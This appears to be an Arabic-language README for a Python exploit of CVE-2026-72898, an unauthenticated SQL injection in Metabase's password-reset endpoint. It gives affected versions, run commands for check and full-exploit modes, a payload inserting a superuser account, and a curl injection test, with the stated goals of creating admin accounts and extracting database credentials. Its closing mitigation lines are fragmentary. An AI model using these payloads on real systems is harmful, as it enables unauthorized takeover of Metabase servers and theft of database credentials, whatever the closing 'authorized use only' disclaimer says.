
استغلال Python للثغرة CVE-2026-72898، وهي حقن SQL غير مُصادَق عليه في نقطة نهاية إعادة تعيين كلمة المرور في Metabase، مما يؤدي إلى إنشاء حسابات مسؤول واستخراج بيانات اعتماد قاعدة البيانات.

حقن SQL بدون مصادقة في نقطة النهاية /api/session/reset_password في Metabase. ينشئ حسابات مسؤول ويستخرج بيانات اعتماد قاعدة البيانات.
المتأثر: v58.0 - v63.3 | المُصحَّح: v58.24+، v59.21+، v60.17+، v61.11+، v62.9+، v63.5+
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check
دمج النصوص في استعلام SQL:
# Vulnerable code
query = f"SELECT * FROM core_user WHERE email='{email}'"
حمولة الهجوم:
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --
الفحص فقط (بدون تعديل):
python3 CVE-2026-72898.py http://localhost:5000 --check
الاستغلال الكامل:
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!
الاختبار اليدوي:
# Verify endpoint
curl http://localhost:5000/api/health
# Test SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
-H "Content-Type: application/json" \
-d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'
الآن:
/api/session/reset_password عبر WAFلاحقًا:
للاستخدام المصرح به فقط. الوصول غير المصرح به غير قانوني.